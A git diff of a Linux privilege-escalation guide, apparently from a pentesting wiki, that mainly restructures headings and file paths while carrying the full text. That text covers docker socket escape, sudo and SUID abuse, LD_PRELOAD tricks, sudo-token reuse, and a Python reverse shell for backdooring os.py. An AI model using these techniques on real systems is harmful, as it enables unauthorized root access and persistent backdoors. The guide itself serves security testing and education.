@@ -525,7 +524,7 @@ Created symlink /etc/systemd/system/multi-user.target.wants/backu2.timer → /li
Note the **timer** is **activated** by creating a symlink to it on `/etc/systemd/system/.wants/.timer`
-# Sockets
+## Sockets
In brief, a Unix Socket (technically, the correct name is Unix domain socket, **UDS**) allows **communication between two different processes** on either the same machine or different machines in client-server application frameworks. To be more precise, it’s a way of communicating among computers using a standard Unix descriptors file. (From [here](https://www.linux.com/news/what-socket/)).
@@ -539,22 +538,22 @@ Sockets can be configured using `.socket` files.
* `ExecStopPre`, `ExecStopPost`: Additional **commands** that are **executed before** or **after** the listening **sockets**/FIFOs are **closed** and removed, respectively.
* `Service`: Specifies the **service** unit name **to activate** on **incoming traffic**. This setting is only allowed for sockets with Accept=no. It defaults to the service that bears the same name as the socket (with the suffix replaced). In most cases, it should not be necessary to use this option.
-# Writable .socket files
+## Writable .socket files
If you find a **writable** `.socket` file you can **add** at the beginning of the `[Socket]` section something like: `ExecStartPre=/home/kali/sys/backdoor` and the backdoor will be executed before the socket is created. Therefore, you will **probably need to wait until the machine is rebooted.**\
_Note that the system must be using that socket file configuration or the backdoor won't be executed_
-# Writable sockets
+## Writable sockets
If you **identify any writable socket** (_now where are talking about Unix Sockets, not about the config `.socket` files_), then, **you can communicate** with that socket and maybe exploit a vulnerability.
-# Enumerate Unix Sockets
+## Enumerate Unix Sockets
```bash
netstat -a -p --unix
```
-# Raw connection
+## Raw connection
```bash
#apt-get install netcat-openbsd
@@ -571,7 +570,7 @@ socat - UNIX-CLIENT:/dev/socket #connect to UNIX-domain socket, irrespective of
[socket-command-injection.md](socket-command-injection.md)
{% endcontent-ref %}
-# HTTP sockets
+## HTTP sockets
Note that there may be some **sockets listening for HTTP** requests (_I'm not talking about .socket files but about the files acting as unix sockets_). You can check this with:
@@ -581,7 +580,7 @@ curl --max-time 2 --unix-socket /pat/to/socket/files http:/index
If the socket **respond with a HTTP** request, then you can **communicate** with it and maybe **exploit some vulnerability**.
-# Writable Docker Socket
+## Writable Docker Socket
The **docker socke**t is typically located at `/var/run/docker.sock` and is only writable by `root` user and `docker` group.\
If for some reason **you have write permissions** over that socket you can escalate privileges.\
@@ -592,7 +591,7 @@ docker -H unix:///var/run/docker.sock run -v /:/host -it ubuntu chroot /host /bi
docker -H unix:///var/run/docker.sock run -it --privileged --pid=host debian nsenter -t 1 -m -u -n -i sh
```
-## Use docker web API from socket without docker package
+### Use docker web API from socket without docker package
If you have access to **docker socket** but you can't use the docker binary (maybe it isn't even installed), you can use directly the web API with `curl`.
@@ -625,9 +624,9 @@ Upgrade: tcp
Now, you can execute commands on the container from this `socat` connection.
-## Others
+### Others
-Note that if you have write permissions over the docker socket because you are **inside the group `docker`** you have [**more ways to escalate privileges**](interesting-groups-linux-pe/#docker-group). If the [**docker API is listening in a port** you can also be able to compromise it](../../pentesting/2375-pentesting-docker.md#compromising).
+Note that if you have write permissions over the docker socket because you are **inside the group `docker`** you have [**more ways to escalate privileges**](interesting-groups-linux-pe/#docker-group). If the [**docker API is listening in a port** you can also be able to compromise it](../../network-services-pentesting/2375-pentesting-docker.md#compromising).
Check **more ways to break out from docker or abuse i to escalate privileges** in:
@@ -635,7 +634,7 @@ Check **more ways to break out from docker or abuse i to escalate privileges** i
[docker-breakout](docker-breakout/)
{% endcontent-ref %}
-# Containerd (ctr) privilege escalation
+## Containerd (ctr) privilege escalation
If you find that you can use the **`ctr`** command read the following page as **you may be able to abuse it to escalate privileges**:
@@ -643,7 +642,7 @@ If you find that you can use the **`ctr`** command read the following page as **
[containerd-ctr-privilege-escalation.md](containerd-ctr-privilege-escalation.md)
{% endcontent-ref %}
-# **RunC** privilege escalation
+## **RunC** privilege escalation
If you find that you can use the **`runc`** command read the following page as **you may be able to abuse it to escalate privileges**:
@@ -651,7 +650,7 @@ If you find that you can use the **`runc`** command read the following page as *
[runc-privilege-escalation.md](runc-privilege-escalation.md)
{% endcontent-ref %}
-# **D-Bus**
+## **D-Bus**
D-BUS is an **inter-process communication (IPC) system**, providing a simple yet powerful mechanism **allowing applications to talk to one another**, communicate information and request services. D-BUS was designed from scratch to fulfil the needs of a modern Linux system.
@@ -681,11 +680,11 @@ Policies to the context "default" affects everyone not affected by other policie
[d-bus-enumeration-and-command-injection-privilege-escalation.md](d-bus-enumeration-and-command-injection-privilege-escalation.md)
{% endcontent-ref %}
-# **Network**
+## **Network**
It's always interesting to enumerate the network and figure out the position of the machine.
-# Generic enumeration
+## Generic enumeration
```bash
#Hostname, hosts and DNS
@@ -710,7 +709,7 @@ cat /etc/networks
lsof -i
```
-# Open ports
+## Open ports
Always check network services running on the machine that you wasn't able to interact with before accessing to it:
@@ -719,7 +718,7 @@ Always check network services running on the machine that you wasn't able to int
(netstat -punta || ss --ntpu) | grep "127.0"
```
-# Sniffing
+## Sniffing
Check if you can sniff traffic. If you can, you could be able to grab some credentials.
@@ -727,9 +726,9 @@ Check if you can sniff traffic. If you can, you could be able to grab some crede
timeout 1 tcpdump
```
-# Users
+## Users
-# Generic Enumeration
+## Generic Enumeration
Check **who** you are, which **privileges** do you have, which **users** are in the systems, which ones can **login** and which ones have **root privileges:**
@@ -755,12 +754,12 @@ for i in $(cut -d":" -f1 /etc/passwd 2>/dev/null);do id $i;done 2>/dev/null | so
gpg --list-keys 2>/dev/null
```
-# Big UID
+## Big UID
Some Linux versions were affected by a bug that allow users with **UID > INT\_MAX** to escalate privileges. More info: [here](https://gitlab.freedesktop.org/polkit/polkit/issues/74), [here](https://github.com/mirchr/security-research/blob/master/vulnerabilities/CVE-2018-19788.sh) and [here](https://twitter.com/paragonsec/status/1071152249529884674).\
**Exploit it** using: **`systemd-run -t /bin/bash`**
-# Groups
+## Groups
Check if you are a **member of some group** that could grant you root privileges:
@@ -768,7 +767,7 @@ Check if you are a **member of some group** that could grant you root privileges
[interesting-groups-linux-pe](interesting-groups-linux-pe/)
{% endcontent-ref %}
-# Clipboard
+## Clipboard
Check if anything interesting is located inside the clipboard (if possible)
@@ -783,28 +782,28 @@ if [ `which xclip 2>/dev/null` ]; then
fi
```
-# Password Policy
+## Password Policy
```bash
grep "^PASS_MAX_DAYS\|^PASS_MIN_DAYS\|^PASS_WARN_AGE\|^ENCRYPT_METHOD" /etc/login.defs
```
-# Known passwords
+## Known passwords
If you **know any password** of the environment **try to login as each user** using the password.
-# Su Brute
+## Su Brute
If don't mind about doing a lot of noise and `su` and `timeout` binaries are present on the computer you can try to brute-force user using [su-bruteforce](https://github.com/carlospolop/su-bruteforce).\
[**Linpeas**](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite) with `-a` parameter also try to brute-force users.
-# Writable PATH abuses
+## Writable PATH abuses
-# $PATH
+## $PATH
If you find that you can **write inside some folder of the $PATH** you may be able to escalate privileges by **creating a backdoor inside the writable folder** with the name of some command that is going to be executed by a different user (root ideally) and that is **not loaded from a folder that is located previous** to your writable folder in $PATH.
-# SUDO and SUID
+## SUDO and SUID
You could be allowed to execute some command using sudo or they could have the suid bit. Check it using:
@@ -824,7 +823,7 @@ ftp>!/bin/sh
less>!
```
-# NOPASSWD
+## NOPASSWD
Sudo configuration might allow a user to execute some command with another user privileges without knowing the password.
@@ -840,7 +839,7 @@ In this example the user `demo` can run `vim` as `root`, it is now trivial to ge
sudo vim -c '!sh'
```
-# SETENV
+## SETENV
This directive allows the user to **set an environment variable** while executing something:
@@ -856,7 +855,7 @@ This example, **based on HTB machine Admirer**, was **vulnerable** to **PYTHONPA
sudo PYTHONPATH=/dev/shm/ /opt/scripts/admin_tasks.sh
```
-# Sudo execution bypassing paths
+## Sudo execution bypassing paths
**Jump** to read other files or use **symlinks**. For example in sudeores file: _hacker10 ALL= (root) /bin/less /var/log/\*_
@@ -879,7 +878,7 @@ sudo less /var/log/something /etc/shadow #Red 2 files
**Countermeasures**: [https://blog.compass-security.com/2012/10/dangerous-sudoers-entries-part-5-recapitulation/](https://blog.compass-security.com/2012/10/dangerous-sudoers-entries-part-5-recapitulation/)
-# Sudo command/SUID binary without command path
+## Sudo command/SUID binary without command path
If the **sudo permission** is given to a single command **without specifying the path**: _hacker10 ALL= (root) less_ you can exploit it by changing the PATH variable
@@ -893,7 +892,7 @@ This technique can also be used if a **suid** binary **executes another command
[Payload examples to execute.](payloads-to-execute.md)
-# SUID binary with command path
+## SUID binary with command path
If the **suid** binary **executes another command specifying the path**, then, you can try to **export a function** named as the command that the suid file is calling.
@@ -906,7 +905,7 @@ export -f /usr/sbin/service
Then, when you call the suid binary, this function will be executed
-# LD\_PRELOAD
+## LD\_PRELOAD
**LD\_PRELOAD** is an optional environmental variable containing one or more paths to shared libraries, or shared objects, that the loader will load before any other shared library including the C runtime library (libc.so) This is called preloading a library.
@@ -946,7 +945,7 @@ Finally, **escalate privileges** running
sudo LD_PRELOAD=pe.so #Use any command you can run with sudo
```
-# SUID Binary – so injection
+## SUID Binary – so injection
If you find some weird binary with **SUID** permissions, you could check if all the **.so** files are **loaded correctly**. In order to do so you can execute:
@@ -977,7 +976,7 @@ gcc -shared -o /home/user/.config/libcalc.so -fPIC /home/user/.config/libcalc.c
And execute the binary.
-# GTFOBins
+## GTFOBins
[**GTFOBins**](https://gtfobins.github.io) is a curated list of Unix binaries that can be exploited by an attacker to bypass local security restrictions.
@@ -990,11 +989,11 @@ The project collects legitimate functions of Unix binaries that can be abused to
{% embed url="https://gtfobins.github.io/" %}
-# FallOfSudo
+## FallOfSudo
If you can access `sudo -l` you can use the tool [**FallOfSudo**](https://github.com/Critical-Start/FallofSudo) to check if it finds how to exploit any sudo rule.
-# Reusing Sudo Tokens
+## Reusing Sudo Tokens
In the scenario where **you have a shell as a user with sudo privileges** but you don't know the password of the user, you can **wait him to execute some command using `sudo`**. Then, you can **access the token of the session where sudo was used and use it to execute anything as sudo** (privilege escalation).
@@ -1031,7 +1030,7 @@ bash exploit_v3.sh
sudo su
```
-# /var/run/sudo/ts/\
+## /var/run/sudo/ts/\
If you have **write permissions** in the folder or on any of the created files inside the folder you can use the binary [**write\_sudo\_token**](https://github.com/nongiach/sudo\_inject/tree/master/extra\_tools) to **create a sudo token for a user and PID**.\
For example if you can overwrite the file _/var/run/sudo/ts/sampleuser_ and you have a shell as that user with PID 1234, you can **obtain sudo privileges** without needing to know the password doing:
@@ -1040,7 +1039,7 @@ For example if you can overwrite the file _/var/run/sudo/ts/sampleuser_ and you
./write_sudo_token 1234 > /var/run/sudo/ts/sampleuser
```
-# /etc/sudoers, /etc/sudoers.d
+## /etc/sudoers, /etc/sudoers.d
The file `/etc/sudoers` and the files inside `/etc/sudoers.d` configure who can use `sudo` and how. This files **by default can only be read by user root and group root**.\
**If** you can **read** this file you could be able to **obtain some interesting information**, and if you can **write** any file you will be able to **escalate privileges**.
@@ -1066,7 +1065,7 @@ echo "Defaults !tty_tickets" > /etc/sudoers.d/win
echo "Defaults timestamp_timeout=-1" >> /etc/sudoers.d/win
```
-# DOAS
+## DOAS
There are some alternatives to the `sudo` binary such as `doas` for OpenBSD, remember to check its configuration at `/etc/doas.conf`
@@ -1074,15 +1073,15 @@ There are some alternatives to the `sudo` binary such as `doas` for OpenBSD, rem
permit nopass demo as root cmd vim
```
-# Sudo Hijacking
+## Sudo Hijacking
If you know that a **user usually connects to a machine and uses `sudo`** to escalate privileges and you got a shell within that user context, you can **create a new sudo executable** that will execute your code as root and then the users command. Then, **modify the $PATH** of the user context (for example adding the new path in .bash\_profile) so we the user executed sudo, your sudo executable is executed.
Note that if the user uses a different shell (not bash) you will need to modify other files to add the new path. For example[ sudo-piggyback](https://github.com/APTy/sudo-piggyback) modifies `~/.bashrc`, `~/.zshrc`, `~/.bash_profile`. You can find another example in [bashdoor.py](https://github.com/n00py/pOSt-eX/blob/master/empire\_modules/bashdoor.py)
-# Shared Library
+## Shared Library
-# ld.so
+## ld.so
The file `/etc/ld.so.conf` indicates **where are loaded the configurations files from**. Typically, this file contains the following path: `include /etc/ld.so.conf.d/*.conf`
@@ -1095,7 +1094,7 @@ Take a look about **how to exploit this misconfiguration** in the following page
[ld.so.conf-example.md](ld.so.conf-example.md)
{% endcontent-ref %}
-# RPATH
+## RPATH
```
level15@nebula:/home/flag15$ readelf -d flag15 | egrep "NEEDED|RPATH"
@@ -1134,7 +1133,7 @@ int __libc_start_main(int (*main) (int, char **, char **), int argc, char ** ubp
}
```
-# Capabilities
+## Capabilities
Linux capabilities provide a **subset of the available root privileges to a process**. This effectively breaks up root **privileges into smaller and distinctive units**. Each of these units can then be independently be granted to processes. This way the full set of privileges is reduced and decreasing the risks of exploitation.\
Read the following page to **learn more about capabilities and how to abuse them**:
@@ -1143,12 +1142,12 @@ Read the following page to **learn more about capabilities and how to abuse them
[linux-capabilities.md](linux-capabilities.md)
{% endcontent-ref %}
-# Directory permissions
+## Directory permissions
In a directory the **bit for execute** implies that the user affected can "**cd**" into the folder.\
The **read** bit implies the user can **list** the **files**, and the **write** bit implies the user can **delete** and **create** new **files**.
-# ACLs
+## ACLs
ACLs are a second level of discretionary permissions, that **may override the standard ugo/rwx** ones. When used correctly they can grant you a **better granularity in setting access to a file or a directory**, for example by giving or denying access to a specific user that is neither the file owner, nor in the group owner (from [**here**](https://linuxconfig.org/how-to-manage-acls-on-linux)).\
**Give** user "kali" read and write permissions over a file:
@@ -1166,12 +1165,12 @@ setfacl -b file.txt #Remove the ACL of the file
getfacl -t -s -R -p /bin /etc /home /opt /root /sbin /usr /tmp 2>/dev/null
```
-# Open shell sessions
+## Open shell sessions
In **old versions** you may **hijack** some **shell** session of a different user (**root**).\
In **newest versions** you will be able to **connect** to screen sessions only of **your own user**. However, you could find **interesting information inside of the session**.
-# screen sessions hijacking
+## screen sessions hijacking
**List screen sessions**
@@ -1188,7 +1187,7 @@ screen -dr #The -d is to detacche whoever is attached to it
screen -dr 3350.foo #In the example of the image
```
-# tmux sessions hijacking
+## tmux sessions hijacking
Apparently this was a problem with **old tmux versions**. I wasn't able to hijack a tmux (v2.1) session created by root from a non-privileged user.
@@ -1212,20 +1211,20 @@ tmux -S /tmp/dev_sess attach -t 0 #Attach using a non-default tmux socket
Check **valentine box from HTB** for an example.
-# SSH
+## SSH
-# Debian OpenSSL Predictable PRNG - CVE-2008-0166
+## Debian OpenSSL Predictable PRNG - CVE-2008-0166
All SSL and SSH keys generated on Debian-based systems (Ubuntu, Kubuntu, etc) between September 2006 and May 13th, 2008 may be affected by this bug.\
This bug caused that when creating in those OS a new ssh key **only 32,768 variations were possible**. This means that all the possibilities can be calculated and **having the ssh public key you can search for the corresponding private key**. You can find the calculated possibilities here: [https://github.com/g0tmi1k/debian-ssh](https://github.com/g0tmi1k/debian-ssh)
-# SSH Interesting configuration values
+## SSH Interesting configuration values
* **PasswordAuthentication:** Specifies whether password authentication is allowed. The default is `no`.
* **PubkeyAuthentication:** Specifies whether public key authentication is allowed. The default is `yes`.
* **PermitEmptyPasswords**: When password authentication is allowed, it specifies whether the server allows login to accounts with empty password strings. The default is `no`.
-## PermitRootLogin
+### PermitRootLogin
Specifies whether root can log in using ssh, default is `no`. Possible values:
@@ -1234,7 +1233,7 @@ Specifies whether root can log in using ssh, default is `no`. Possible values:
* `forced-commands-only`: Root can login only using privatekey cand if the commands options is specified
* `no` : no
-## AuthorizedKeysFile
+### AuthorizedKeysFile
Specifies files that contains the public keys that can be used for user authentication. I can contains tokens like `%h` , that will be replaced by the home directory. **You can indicate absolute paths** (starting in `/`) or **relative paths from the users home**. For example:
@@ -1244,7 +1243,7 @@ AuthorizedKeysFile .ssh/authorized_keys access
That configuration will indicate that if you try to login with the **private** key of the user "**testusername**" ssh is going to compare the public key of your key with the ones located in `/home/testusername/.ssh/authorized_keys` and `/home/testusername/access`
-## ForwardAgent/AllowAgentForwarding
+### ForwardAgent/AllowAgentForwarding
SSH agent forwarding allows you to **use your local SSH keys instead of leaving keys** (without passphrases!) sitting on your server. So, you will be able to **jump** via ssh **to a host** and from there **jump to another** host **using** the **key** located in your **initial host**.
@@ -1262,9 +1261,9 @@ The file `/etc/sshd_config` can **allow** or **denied** ssh-agent forwarding wit
If you Forward Agent configured in an environment \[**check here how to exploit it to escalate privileges**]\(ssh-forward-agent-exploitation.md).
-# Interesting Files
+## Interesting Files
-# Profiles files
+## Profiles files
The file `/etc/profile` and the files under `/etc/profile.d/` are **scripts that are executed when a user run a new shell**. Therefore, if you can **write or modify any of the you can escalate privileges**.
@@ -1274,7 +1273,7 @@ ls -l /etc/profile /etc/profile.d/
If any weird profile script is found you should check it for **sensitive details**.
-# Passwd/Shadow Files
+## Passwd/Shadow Files
Depending on the OS the `/etc/passwd` and `/etc/shadow` files may be using a different name or there may be a backup. Therefore it's recommended **find all of hem** and **check if you can read** them and **check if there are hashes** inside the files:
@@ -1291,7 +1290,7 @@ In some occasions you can find **password hashes** inside the `/etc/passwd` (or
grep -v '^[^:]*:[x\*]' /etc/passwd /etc/pwd.db /etc/master.passwd /etc/group 2>/dev/null
```
-## Writable /etc/passwd
+### Writable /etc/passwd
First generate a password with one of the following commands.
@@ -1338,7 +1337,7 @@ Group=root
Your backdoor will be executed the next time that tomcat is started.
-# Check Folders
+## Check Folders
The following folders may contain backups or interesting information: **/tmp**, **/var/tmp**, **/var/backups, /var/mail, /var/spool/mail, /etc/exports, /root** (Probably you won't be able to read the last one but try)
@@ -1346,7 +1345,7 @@ The following folders may contain backups or interesting information: **/tmp**,
ls -a /tmp /var/tmp /var/backups /var/mail/ /var/spool/mail/ /root
```
-# Weird Location/Owned files
+## Weird Location/Owned files
```bash
#root owned files in /home folders
@@ -1365,38 +1364,38 @@ for g in `groups`;
done
```
-# Modified files in last mins
+## Modified files in last mins
```bash
find / -type f -mmin -5 ! -path "/proc/*" ! -path "/sys/*" ! -path "/run/*" ! -path "/dev/*" ! -path "/var/lib/*" 2>/dev/null
```
-# Sqlite DB files
+## Sqlite DB files
```bash
find / -name '*.db' -o -name '*.sqlite' -o -name '*.sqlite3' 2>/dev/null
```
-# \*\_history, .sudo\_as\_admin\_successful, profile, bashrc, httpd.conf, .plan, .htpasswd, .git-credentials, .rhosts, hosts.equiv, Dockerfile, docker-compose.yml files
+## \*\_history, .sudo\_as\_admin\_successful, profile, bashrc, httpd.conf, .plan, .htpasswd, .git-credentials, .rhosts, hosts.equiv, Dockerfile, docker-compose.yml files
```bash
fils=`find / -type f \( -name "*_history" -o -name ".sudo_as_admin_successful" -o -name ".profile" -o -name "*bashrc" -o -name "httpd.conf" -o -name "*.plan" -o -name ".htpasswd" -o -name ".git-credentials" -o -name "*.rhosts" -o -name "hosts.equiv" -o -name "Dockerfile" -o -name "docker-compose.yml" \) 2>/dev/null`Hidden files
```
-# Hidden files
+## Hidden files
```bash
find / -type f -iname ".*" -ls 2>/dev/null
```
-# **Script/Binaries in PATH**
+## **Script/Binaries in PATH**
```bash
for d in `echo $PATH | tr ":" "\n"`; do find $d -name "*.sh" 2>/dev/null; done
for d in `echo $PATH | tr ":" "\n"`; do find $d -type -f -executable 2>/dev/null; done
```
-# **Web files**
+## **Web files**
```bash
ls -alhR /var/www/ 2>/dev/null
@@ -1405,18 +1404,18 @@ ls -alhR /usr/local/www/apache22/data/
ls -alhR /opt/lampp/htdocs/ 2>/dev/null
```
-# **Backups**
+## **Backups**
```bash
find /var /etc /bin /sbin /home /usr/local/bin /usr/local/sbin /usr/bin /usr/games /usr/sbin /root /tmp -type f \( -name "*backup*" -o -name "*\.bak" -o -name "*\.bck" -o -name "*\.bk" \) 2>/dev/nulll
```
-# Known files containing passwords
+## Known files containing passwords
Read the code of [**linPEAS**](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/linPEAS), it searches for **several possible files that could contain passwords**.\
**Other interesting tool** that you can use to do so is: [**LaZagne**](https://github.com/AlessandroZ/LaZagne) which is an open source application used to retrieve lots of passwords stored on a local computer for Windows, Linux & Mac.
-# Logs
+## Logs
If you can read logs, you may be able to find **interesting/confidential information inside of them**. The more strange the log is, the more interesting will be (probably).\
Also, some "**bad**" configured (backdoored?) **audit logs** may allow you to **record passwords** inside audit logs as explained in this post: [https://www.redsiege.com/blog/2019/05/logging-passwords-on-linux/](https://www.redsiege.com/blog/2019/05/logging-passwords-on-linux/).
@@ -1428,7 +1427,7 @@ grep -RE 'comm="su"|comm="sudo"' /var/log* 2>/dev/null
In order to **read logs the group** [**adm**](interesting-groups-linux-pe/#adm-group) will be really helpful.
-# Shell files
+## Shell files
```bash
~/.bash_profile # if it exists, read once when you log in to the shell
@@ -1441,14 +1440,14 @@ In order to **read logs the group** [**adm**](interesting-groups-linux-pe/#adm-g
~/.zshrc #zsh shell
```
-# Generic Creds Search/Regex
+## Generic Creds Search/Regex
You should also check for files containing the word "**password**" in it's **name** or inside the **content**, also check for IPs and emails inside logs, or hashes regexps.\
I'm not going to list here how to do all of this but if you are interested you can check the last checks that [**linpeas**](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/blob/master/linPEAS/linpeas.sh) perform.
-# Writable files
+## Writable files
-# Python library hijacking
+## Python library hijacking
If you know from **where** a python script is going to be executed and you **can write inside** that folder or you can **modify python libraries**, you can modify the os library and backdoor it (if you can write where python script is going to be executed, copy and paste the os.py library).
@@ -1458,7 +1457,7 @@ To **backdoor the library** just add at the end of the os.py library the followi
import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.14",5678));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);
```
-# Logrotate exploitation
+## Logrotate exploitation
There is a vulnerability on `logrotate`that allows a user with **write permissions over a log file** or **any** of its **parent directories** to make `logrotate`write **a file in any location**. If **logrotate** is being executed by **root**, then the user will be able to write any file in _**/etc/bash\_completion.d/**_ that will be executed by any user that login.\
So, if you have **write perms** over a **log file** **or** any of its **parent folder**, you can **privesc** (on most linux distributions, logrotate is executed automatically once a day as **user root**). Also, check if apart of _/var/log_ there are more files being **rotated**.
@@ -1473,7 +1472,7 @@ You can exploit this vulnerability with [**logrotten**](https://github.com/whotw
This vulnerability is very similar to [**CVE-2016-1247**](https://www.cvedetails.com/cve/CVE-2016-1247/) **(nginx logs),** so whenever you find that you can alter logs, check who is managing those logs and check if you can escalate privileges substituting the logs by symlinks.
-# /etc/sysconfig/network-scripts/ (Centos/Redhat)
+## /etc/sysconfig/network-scripts/ (Centos/Redhat)
If, for whatever reason, a user is able to **write** an `ifcf-` script to _/etc/sysconfig/network-scripts_ **or** it can **adjust** an existing one, then your **system is pwned**.
@@ -1493,7 +1492,7 @@ DEVICE=eth0
**Vulnerability reference:** [**https://vulmon.com/exploitdetails?qidtp=maillist\_fulldisclosure\&qid=e026a0c5f83df4fd532442e1324ffa4f**](https://vulmon.com/exploitdetails?qidtp=maillist\_fulldisclosure\&qid=e026a0c5f83df4fd532442e1324ffa4f)
-# **init, init.d, systemd, and rc.d**
+## **init, init.d, systemd, and rc.d**
`/etc/init.d` contains **scripts** used by the System V init tools (SysVinit). This is the **traditional service management package for Linux**, containing the `init` program (the first process that is run when the kernel has finished initializing¹) as well as some infrastructure to start and stop services and configure them. Specifically, files in `/etc/init.d` are shell scripts that respond to `start`, `stop`, `restart`, and (when supported) `reload` commands to manage a particular service. These scripts can be invoked directly or (most commonly) via some other trigger (typically the presence of a symbolic link in `/etc/rc?.d/`). (From [here](https://askubuntu.com/questions/5039/what-is-the-difference-between-etc-init-and-etc-init-d#:\~:text=%2Fetc%2Finit%20contains%20configuration%20files,the%20status%20of%20a%20service.))\
Other alternative to this folder is `/etc/rc.d/init.d` in Redhat
@@ -1503,38 +1502,38 @@ Other alternative to this folder is `/etc/rc.d/init.d` in Redhat
**systemd** is a **Linux initialization system and service manager that includes features like on-demand starting of daemons**, mount and automount point maintenance, snapshot support, and processes tracking using Linux control groups. systemd provides a logging daemon and other tools and utilities to help with common system administration tasks. (From [here](https://www.linode.com/docs/quick-answers/linux-essentials/what-is-systemd/#:\~:text=The%20%2Frun%2Fsystemd%2Fsystem,anywhere%20else%20in%20the%20system.))\
Files that ships in packages downloaded from distribution repository go into `/usr/lib/systemd/`. Modifications done by system administrator (user) go into `/etc/systemd/system/`.
-# Other Tricks
+## Other Tricks
-# NFS Privilege escalation
+## NFS Privilege escalation
{% content-ref url="nfs-no_root_squash-misconfiguration-pe.md" %}
[nfs-no\_root\_squash-misconfiguration-pe.md](nfs-no\_root\_squash-misconfiguration-pe.md)
{% endcontent-ref %}
-# Escaping from restricted Shells
+## Escaping from restricted Shells
{% content-ref url="escaping-from-limited-bash.md" %}
[escaping-from-limited-bash.md](escaping-from-limited-bash.md)
{% endcontent-ref %}
-# Cisco - vmanage
+## Cisco - vmanage
{% content-ref url="cisco-vmanage.md" %}
[cisco-vmanage.md](cisco-vmanage.md)
{% endcontent-ref %}
-# Kernel Security Protections
+## Kernel Security Protections
* [https://github.com/a13xp0p0v/kconfig-hardened-check](https://github.com/a13xp0p0v/kconfig-hardened-check)
* [https://github.com/a13xp0p0v/linux-kernel-defence-map](https://github.com/a13xp0p0v/linux-kernel-defence-map)
-# More help
+## More help
[Static impacket binaries](https://github.com/ropnop/impacket\_static\_binaries)
-# Linux/Unix Privesc Tools
+## Linux/Unix Privesc Tools
-# **Best tool to look for Linux local privilege escalation vectors:** [**LinPEAS**](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/linPEAS)
+## **Best tool to look for Linux local privilege escalation vectors:** [**LinPEAS**](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/linPEAS)
**LinEnum**: [https://github.com/rebootuser/LinEnum](https://github.com/rebootuser/LinEnum)(-t option)\
**Enumy**: [https://github.com/luke-goddard/enumy](https://github.com/luke-goddard/enumy)\
@@ -1547,7 +1546,7 @@ Files that ships in packages downloaded from distribution repository go into `/u
**EvilAbigail (physical access):** [https://github.com/GDSSecurity/EvilAbigail](https://github.com/GDSSecurity/EvilAbigail)\
**Recopilation of more scripts**: [https://github.com/1N3/PrivEsc](https://github.com/1N3/PrivEsc)
-# References
+## References
[https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/](https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/)\
[https://payatu.com/guide-linux-privilege-escalation/](https://payatu.com/guide-linux-privilege-escalation/)\
@@ -1559,7 +1558,6 @@ Files that ships in packages downloaded from distribution repository go into `/u
[https://github.com/lucyoa/kernel-exploits](https://github.com/lucyoa/kernel-exploits)\
[https://github.com/rtcrowley/linux-private-i](https://github.com/rtcrowley/linux-private-i)
-
-
-
diff --git a/linux-unix/privilege-escalation/cisco-vmanage.md b/linux-hardening/privilege-escalation/cisco-vmanage.md
similarity index 100%
rename from linux-unix/privilege-escalation/cisco-vmanage.md
rename to linux-hardening/privilege-escalation/cisco-vmanage.md
diff --git a/linux-unix/privilege-escalation/containerd-ctr-privilege-escalation.md b/linux-hardening/privilege-escalation/containerd-ctr-privilege-escalation.md
similarity index 93%
rename from linux-unix/privilege-escalation/containerd-ctr-privilege-escalation.md
rename to linux-hardening/privilege-escalation/containerd-ctr-privilege-escalation.md
index 8b77d42f..58eaee3a 100644
--- a/linux-unix/privilege-escalation/containerd-ctr-privilege-escalation.md
+++ b/linux-hardening/privilege-escalation/containerd-ctr-privilege-escalation.md
@@ -1,4 +1,4 @@
-
+# Containerd (ctr) Privilege Escalation
-
-
diff --git a/linux-unix/privilege-escalation/d-bus-enumeration-and-command-injection-privilege-escalation.md b/linux-hardening/privilege-escalation/d-bus-enumeration-and-command-injection-privilege-escalation.md
similarity index 100%
rename from linux-unix/privilege-escalation/d-bus-enumeration-and-command-injection-privilege-escalation.md
rename to linux-hardening/privilege-escalation/d-bus-enumeration-and-command-injection-privilege-escalation.md
diff --git a/linux-unix/privilege-escalation/docker-breakout/README.md b/linux-hardening/privilege-escalation/docker-breakout/README.md
similarity index 96%
rename from linux-unix/privilege-escalation/docker-breakout/README.md
rename to linux-hardening/privilege-escalation/docker-breakout/README.md
index ff06ae7f..4ea3bdf3 100644
--- a/linux-unix/privilege-escalation/docker-breakout/README.md
+++ b/linux-hardening/privilege-escalation/docker-breakout/README.md
@@ -1,4 +1,4 @@
-
+# Docker Basics & Breakout
/ns #Get the Group and the namespaces (some may be uniq to the hosts and some may be shred with it)
```
-## Capabilities
+### Capabilities
Capabilities allow **finer control for the capabilities that can be allowed** for root user. Docker uses the Linux kernel capability feature to **limit the operations that can be done inside a Container** irrespective of the type of user.
@@ -160,7 +158,7 @@ Capabilities allow **finer control for the capabilities that can be allowed** fo
[linux-capabilities.md](../linux-capabilities.md)
{% endcontent-ref %}
-## Seccomp in Docker
+### Seccomp in Docker
This is a security feature that allows Docker to **limit the syscalls** that can be used inside the container:
@@ -168,7 +166,7 @@ This is a security feature that allows Docker to **limit the syscalls** that can
[seccomp.md](seccomp.md)
{% endcontent-ref %}
-## AppArmor in Docker
+### AppArmor in Docker
**AppArmor** is a kernel enhancement to confine **containers** to a **limited** set of **resources** with **per-program profiles**.:
@@ -176,7 +174,7 @@ This is a security feature that allows Docker to **limit the syscalls** that can
[apparmor.md](apparmor.md)
{% endcontent-ref %}
-## SELinux in Docker
+### SELinux in Docker
[SELinux](https://www.redhat.com/en/blog/latest-container-exploit-runc-can-be-blocked-selinux) is a **labeling** **system**. Every **process** and every **file** system object has a **label**. SELinux policies define rules about what a **process label is allowed to do with all of the other labels** on the system.
@@ -186,7 +184,7 @@ Container engines launch **container processes with a single confined SELinux la
[selinux.md](../selinux.md)
{% endcontent-ref %}
-## AuthZ & AuthN
+### AuthZ & AuthN
